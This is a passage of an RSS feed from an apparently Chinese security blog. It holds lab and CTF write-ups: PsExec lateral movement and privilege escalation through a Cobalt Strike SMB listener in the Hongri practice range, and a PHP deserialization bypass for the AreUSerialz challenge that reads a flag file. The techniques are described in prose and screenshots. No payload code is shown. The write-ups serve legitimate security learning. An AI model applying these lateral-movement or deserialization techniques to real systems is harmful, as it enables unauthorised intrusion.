3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">横向渗透</span></span></h4><div class="notion-text notion-block-fd3687a8b82a40aeb9b33d0e0098e959"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://zhuanlan.zhihu.com/p/562614805">【横向移动】PsExec工具远程命令执行横向移动 - 知乎 (zhihu.com)</a></div><div class="notion-text notion-block-bd3014b9a5e94c539759fc77d3e0596d"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-23a393fa9a884321bae2939043ed5884"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F04dddcc0-8591-4204-8761-f6988bf928b7%2FUntitled.png?table=block&amp;id=23a393fa-9a88-4321-bae2-939043ed5884&amp;t=23a393fa-9a88-4321-bae2-939043ed5884&amp;width=906&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-f8a99d1aca714a3ba6e0bbb0bb82e657"></div><div class="notion-text notion-block-e053de8516a7417789ccf3b9daf2b20f">psexec需要正确凭证才可使用，前面已经抓取了明文密码</div><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-5489360d4be446cabd5b314ad26d61b1" data-id="5489360d4be446cabd5b314ad26d61b1"><span><div id="5489360d4be446cabd5b314ad26d61b1" class="notion-header-anchor"></div><a class="notion-hash-link" href="#5489360d4be446cabd5b314ad26d61b1" title="创建smb监听器"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">创建smb监听器</span></span></h4><div class="notion-text notion-block-cf166c4afaba48e9adc74539a519abc7">Cobalt Strike使用PsExec等工具时通常需要SMB（Server Message Block）监听器的原因是 PsExec 利用了 SMB 协议进行远程执行。SMB是一种在局域网中共享文件和打印机的协议，而PsExec则通过SMB协议来实现在远程系统上执行命令的功能。PsExec通常使用SMB（Server Message Block）协议来执行远程命令。</div><div class="notion-text notion-block-02259a2a3d944b1f856ef86b6ffbfbe2">以下是使用SMB监听器的一些关键原因：</div><ol start="1" class="notion-list notion-list-numbered notion-block-9e62370b61a84353b2b3951d51c541a2"><li>远程执行命令： PsExec主要用于在远程系统上执行命令。当Cobalt Strike使用PsExec时，它需要在目标系统上创建一个SMB会话，以便通过SMB传输执行文件和与目标系统进行通信。</li></ol><ol start="2" class="notion-list notion-list-numbered notion-block-043afc5cecf742f082ff695feec26def"><li>文件传输： PsExec在执行远程命令时，可能需要将执行所需的文件传输到目标系统。这些文件通常包含执行文件、Payload等。SMB监听器提供了一个方便的通道，使得这些文件可以通过SMB协议传输。</li></ol><ol start="3" class="notion-list notion-list-numbered notion-block-02c38d4ec0894bd8b5b517ec7605a855"><li>身份验证： 使用SMB监听器可以更容易地实现对目标系统的身份验证。这对于在远程系统上执行命令而不引起不必要的警报和检测非常重要。</li></ol><div class="notion-text notion-block-64759ec3f95542c7bb2473c8ec49a901"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-2ebc446c85854b56b1b727c1047569c7"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:456px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fd75ad718-32b2-4464-8c91-d0b962f651c1%2FUntitled.png?table=block&amp;id=2ebc446c-8585-4b56-b1b7-27c1047569c7&amp;t=2ebc446c-8585-4b56-b1b7-27c1047569c7&amp;width=456&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-4e6a2c8e8f05444eb3574ec4f8c015bd">创建smb监听器</div><div class="notion-text notion-block-5e5c1c3d9de3460c907bb5ccbda74939"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-bedbf6dfff664769b8fa3358f7d205ea"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:647px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fdb9d7609-d549-4227-86e1-d7606004a704%2FUntitled.png?table=block&amp;id=bedbf6df-ff66-4769-b8fa-3358f7d205ea&amp;t=bedbf6df-ff66-4769-b8fa-3358f7d205ea&amp;width=647&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-0791321e4451491c83203796cad6582b"></div><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-c0eec942254d4649bda398740f2aa070" data-id="c0eec942254d4649bda398740f2aa070"><span><div id="c0eec942254d4649bda398740f2aa070" class="notion-header-anchor"></div><a class="notion-hash-link" href="#c0eec942254d4649bda398740f2aa070" title="提权+psexec横向"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">提权+psexec横向</span></span></h4><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-cf22ccc675304dea9607413d95c1bbc5" data-id="cf22ccc675304dea9607413d95c1bbc5"><span><div id="cf22ccc675304dea9607413d95c1bbc5" class="notion-header-anchor"></div><a class="notion-hash-link" href="#cf22ccc675304dea9607413d95c1bbc5" title="模块提权"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">模块提权</span></span></h4><div class="notion-text notion-block-40314cf750a04567b3ae4158ef71e3a0"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-161ba28efe864fc3b05c73559d78e8f8"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fd084ab20-55da-4edf-b42e-41996e33d7ef%2FUntitled.png?table=block&amp;id=161ba28e-fe86-4fc3-b05c-73559d78e8f8&amp;t=161ba28e-fe86-4fc3-b05c-73559d78e8f8&amp;width=806&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-71b746f6a02c486886ad7085dc503fd4">使用poc模块提权，psexec需要system权限</div><div class="notion-text notion-block-88f9735cd2e14524895ab926921b0c39"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-7f0a6b5e8a2e4116ba999eda1b4ba961"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F0bd4a40b-cd1d-4c2d-a4d4-3a4b8041121d%2FUntitled.png?table=block&amp;id=7f0a6b5e-8a2e-4116-ba99-9eda1b4ba961&amp;t=7f0a6b5e-8a2e-4116-ba99-9eda1b4ba961&amp;width=1091&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-048a712e482e4ce8b01c1cbeeb1e1acf">用提权后的主机，使用psexec横向渗透即可</div><div class="notion-text notion-block-cc1cc82a162b4e259c472d9871a7ea12"></div><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-6452d00382a248df9acc79919ac45b98" data-id="6452d00382a248df9acc79919ac45b98"><span><div id="6452d00382a248df9acc79919ac45b98" class="notion-header-anchor"></div><a class="notion-hash-link" href="#6452d00382a248df9acc79919ac45b98" title="psexec提权"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">psexec提权</span></span></h4><div class="notion-text notion-block-a1172dcb6dc443a38a9cb71c46e515e1"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-aef66d337b384acda0cde782a4972a81"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F6df7c1bb-8ab1-40ae-8efc-9f10da947a6c%2FUntitled.png?table=block&amp;id=aef66d33-7b38-4acd-a0cd-e782a4972a81&amp;t=aef66d33-7b38-4acd-a0cd-e782a4972a81&amp;width=1116&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-c3f5943d9aa44a35b48bdb1b96a9118b"></div><div class="notion-text notion-block-bfcba414318b4bdd95971f2f04832e36">对administrator进行psexec横向提权，用新的会话（SYSTEM权限用户）对其它主机进行psexec横向</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-4389e8332d6445c7aee0924610cd50df" data-id="4389e8332d6445c7aee0924610cd50df"><span><div id="4389e8332d6445c7aee0924610cd50df" class="notion-header-anchor"></div><a class="notion-hash-link" href="#4389e8332d6445c7aee0924610cd50df" title="🤗 总结归纳"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">🤗 总结归纳</span></span></h2><div class="notion-text notion-block-b480f334f5634b398ab0b63305197c5c">重新打一遍红日靶场1，发现真的有很多细节</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-9a8ef313ca4346af992de98de61f4f5d" data-id="9a8ef313ca4346af992de98de61f4f5d"><span><div id="9a8ef313ca4346af992de98de61f4f5d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#9a8ef313ca4346af992de98de61f4f5d" title="📎 参考文章"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📎 参考文章</span></span></h2><ul class="notion-list notion-list-disc notion-block-f4b7bb89a36c499a98f1f5fdf5eec627"><li>一些引用</li></ul><ul class="notion-list notion-list-disc notion-block-7f2c88255532415ca93401b2f5bb3cdd"><li>引用文章</li></ul><div class="notion-blank notion-block-a43b8a7ed5024ce699f83f246e1d17e3"> </div><div class="notion-callout notion-gray_background_co notion-block-85aa30651f004ccc969ef453d93db108"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="💡">💡</span></div><div class="notion-callout-text">有关Notion安装或者使用上的问题，欢迎您在底部评论区留言，一起交流~</div></div></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[[网鼎杯 2020 青龙组]AreUSerialz]]></title>
            <link>https://yuki8888.top/article/38f2b430-bdc4-4221-b99c-8433487748cd</link>
            <guid>https://yuki8888.top/article/38f2b430-bdc4-4221-b99c-8433487748cd</guid>
            <pubDate>Wed, 11 Oct 2023 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-38f2b430bdc44221b99c8433487748cd"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><div class="notion-callout notion-gray_background_co notion-block-b8269f6b2bf945efa5b8a73590afdbbc"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="😀">😀</span></div><div class="notion-callout-text">这里写文章的前言：
一个简单的开头,简述这篇文章讨论的问题、目标、人物、背景是什么？并简述你给出的答案。<div class="notion-text notion-block-e967caadc89849edb4896d3570249084">可以说说你的故事：阻碍、努力、结果成果，意外与转折。</div></div></div><div class="notion-blank notion-block-8bda0b98dcc642e7ad7a4479d9003eec"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-3cf96ff1179941ad86f6247a961cd0b8" data-id="3cf96ff1179941ad86f6247a961cd0b8"><span><div id="3cf96ff1179941ad86f6247a961cd0b8" class="notion-header-anchor"></div><a class="notion-hash-link" href="#3cf96ff1179941ad86f6247a961cd0b8" title="📝 主旨内容"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📝 主旨内容</span></span></h2><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-377886a932cc48c9b2e21c40af0ce70a" data-id="377886a932cc48c9b2e21c40af0ce70a"><span><div id="377886a932cc48c9b2e21c40af0ce70a" class="notion-header-anchor"></div><a class="notion-hash-link" href="#377886a932cc48c9b2e21c40af0ce70a" title="[网鼎杯 2020 青龙组]AreUSerialz（BUUCTF）"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[网鼎杯 2020 青龙组]AreUSerialz（BUUCTF）</b></span></span></h3><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-4f491025e08346afb08db00891e7df86"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fc3bf46b5-ca95-404c-b0d2-fd285f844b7a%2FUntitled.png?table=block&amp;id=4f491025-e083-46af-b08d-b00891e7df86&amp;t=4f491025-e083-46af-b08d-b00891e7df86&amp;width=800&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-bc0de4469d2f462a9a289b0ec23bb536">题目到手第一步，代码审计</div><div class="notion-text notion-block-58a29b6dbf54477c899778a22aa43611">①对每个函数进行联系</div><div class="notion-text notion-block-5c0a233eb3de49ebb75279e62475e56d">②对代码流程分析</div><div class="notion-text notion-block-b87288bb5243468e88622ad3dcce1e2e">关键点在于file_get_content()函数，可以用来读取flag文件，对file_get_content()函数追踪后流程如下所示</div><ul class="notion-list notion-list-disc notion-block-3351800d38d34ec9880ccc787da34289"><li>$str = $_GET[&#x27;str&#x27;]</li><ul class="notion-list notion-list-disc notion-block-3351800d38d34ec9880ccc787da34289"><li>is_vail($str)</li><ul class="notion-list notion-list-disc notion-block-1b2b0dd378af4ee480856c621251f851"><li>unserialize($str)</li><ul class="notion-list notion-list-disc notion-block-f9a963081f984520892295f86c134160"><li>___destruct()</li><ul class="notion-list notion-list-disc notion-block-9490083bce58471490b8552985197ad3"><li>process()</li><ul class="notion-list notion-list-disc notion-block-9ffe1c47fc1b4920bb65ff8020a709dc"><li>read()</li><ul class="notion-list notion-list-disc notion-block-9943963926f7463a876f6eceaa181be3"><li>output($res)</li><ul class="notion-list notion-list-disc notion-block-c5ffe2410cb544f092ca8d9e35813428"><li>$res == read()</li><ul class="notion-list notion-list-disc notion-block-1f46da47787a454eb99d6ff6008c2db2"><li>$res = file_get_contents(filename)</li></ul></ul></ul></ul></ul></ul></ul></ul></ul><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-52092ba8972f4bdb8ea0b97ac13aa661"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F0d2de9c6-b30b-48d4-90be-264d5d142eea%2F%25E7%25BD%2591%25E9%25BC%258E%25E6%259D%25AF_2020_%25E9%259D%2592%25E9%25BE%2599%25E7%25BB%2584AreUSerialz%25EF%25BC%2588BUUCTF%25EF%25BC%2589.png?table=block&amp;id=52092ba8-972f-4bdb-8ea0-b97ac13aa661&amp;t=52092ba8-972f-4bdb-8ea0-b97ac13aa661&amp;width=800&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-717fe15c4fb240cf8647b338c7aafaef">同时：</div><div class="notion-text notion-block-bef490f885ba4790847b34b541155be6">  （1）FileHandler三个变量权限都是protected，而protected权限的变量在序列化的时会有%00*%00字符，%00字符的ASCII码为0，就无法通过上面的is_valid函数校验</div><div class="notion-text notion-block-ac9f7e6b3a8040bca9fa09624c1eaf4b">   绕过方法1：<b>对于PHP版本7.1+，对属性的类型不敏感</b>，可以将protected类型改为public，直接进行序列化，这样既不会出现%00*%00，同时也可以输出变量。
　　绕过方法2：利用大写S采用的16进制，来绕过is_valid中对空字节的检查。 //00 替换 %00 。
　（2）强比较和弱比较的利用。将op设置为int型的2，op === &quot;2&quot;为false，op == &quot;2&quot;为true,绕过析构函数中的if判断，同时又可以调用到读文件的流程</div><div class="notion-text notion-block-5a035b0245494635851c90fe316820d0">第一遍传入</div><div class="notion-text notion-block-54f3df17ac2c438bb019002d498d48fc">可以发现index.php的绝对路径<code class="notion-inline-code">/var/www/html/inde.php</code>,同时flag.php在同一目录下</div><div class="notion-text notion-block-48ee065cf44f464995328b62b3684540">故<code class="notion-inline-code">/var/www/html/flag.php</code></div><div class="notion-text notion-block-4fcf748dad4441b4ac6cdd8ff74e1467">payload如下</div><div class="notion-text notion-block-f88ca7e2ab5a48d7807bcbdf76ce257c">（只在burp中看见flag，浏览器没渲染出来？）</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-f0b3ac520f0c4d00a05e65e1be454999"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Ff6195fce-5d80-437e-bd27-280379a9d746%2FUntitled.png?table=block&amp;id=f0b3ac52-0f0c-4d00-a05e-65e1be454999&amp;t=f0b3ac52-0f0c-4d00-a05e-65e1be454999&amp;width=800&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-64d088c93ad24af5a2e313d862215b25" data-id="64d088c93ad24af5a2e313d862215b25"><span><div id="64d088c93ad24af5a2e313d862215b25" class="notion-header-anchor"></div><a class="notion-hash-link" href="#64d088c93ad24af5a2e313d862215b25" title="🤗 总结归纳"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">🤗 总结归纳</span></span></h2><div class="notion-text notion-block-b342901d0c4548568609347e1bf8439d">考点：</div><div class="notion-text notion-block-82ce1062865c46acb288061d2e46bb98">  （1）FileHandler三个变量权限都是protected，而protected权限的变量在序列化的时会有%00*%00字符，%00字符的ASCII码为0，就无法通过上面的is_valid函数校验</div><div class="notion-text notion-block-5b22e8f9050d497584be4d4148d065c6">   绕过方法1：<b>对于PHP版本7.1+，对属性的类型不敏感</b>，可以将protected类型改为public，直接进行序列化，这样既不会出现%00*%00，同时也可以输出变量。
　　绕过方法2：利用大写S采用的16进制，来绕过is_valid中对空字节的检查。 //00 替换 %00 。
　（2）强比较和弱比较的利用。将op设置为int型的2，op === &quot;2&quot;为false，op == &quot;2&quot;为true,绕过析构函数中的if判断，同时又可以调用到读文件的流程</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-fcd7882a1e4643fc9c9ccfa234f875a6" data-id="fcd7882a1e4643fc9c9ccfa234f875a6"><span><div id="fcd7882a1e4643fc9c9ccfa234f875a6" class="notion-header-anchor"></div><a class="notion-hash-link" href="#fcd7882a1e4643fc9c9ccfa234f875a6" title="📎 参考文章"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📎 参考文章</span></span></h2><ul class="notion-list notion-list-disc notion-block-d73eb7fe0f594a8da354476cdd310fc6"><li>一些引用</li></ul><ul class="notion-list notion-list-disc notion-block-430975d6819c4019a8d96b3249e99d55"><li>引用文章</li></ul><div class="notion-blank notion-block-65bfb17b9ee647579ca410ead271c521"> </div><div class="notion-callout notion-gray_background_co notion-block-31192ef3c464447f8b3fc3c31d49826f"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="💡">💡</span></div><div class="notion-callout-text">有关Notion安装或者使用上的问题，欢迎您在底部评论区留言，一起交流~</div></div></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[记录红日靶场一]]></title>
            <link>https://yuki8888.top/article/3a457dac-b9c6-4be9-a7fe-6cbd45438b9b</link>
            <guid>https://yuki8888.top/article/3a457dac-b9c6-4be9-a7fe-6cbd45438b9b</guid>
            <pubDate>Thu, 31 Aug 2023 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-3a457dacb9c64be9a7fe6cbd45438b9b"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><div class="notion-callout notion-gray_background_co notion-block-55236830aebe49de803bc2bbafb193be"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="😀">😀</span></div><div class="notion-callout-text">闲着没事打了一下红日靶场，打了时间有点长（太菜了），便记录一下过程</div></div><div class="notion-blank notion-block-0f6f8728d3fb4a6296a8807b3a402083"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-00b17955ae89403f8630445a5a9f5719" data-id="00b17955ae89403f8630445a5a9f5719"><span><div id="00b17955ae89403f8630445a5a9f5719" class="notion-header-anchor"></div><a class="notion-hash-link" href="#00b17955ae89403f8630445a5a9f5719" title="📝 红日靶场"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📝 红日靶场</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-c9a3cda163f7474eb5f23775ca502359" data-id="c9a3cda163f7474eb5f23775ca502359"><span><div id="c9a3cda163f7474eb5f23775ca502359" class="notion-header-anchor"></div><a class="notion-hash-link" href="#c9a3cda163f7474eb5f23775ca502359" title="红日靶场"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">红日靶场</span></span></h2><div class="notion-text notion-block-ffe51bab8a4342f29c165b12de62648e">参考文章：</div><div class="notion-text notion-block-a4492045bdfc4eaab291ee89938a8697"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.freebuf.com/articles/web/324441.html">ATT&amp;CK红队评估（红日靶场一） - FreeBuf网络安全行业门户</a></div><div class="notion-text notion-block-5c632abc5e6a4cfcbffae78761880fc8"><a target="_blank" rel="noopener noreferrer" class="notion-link" 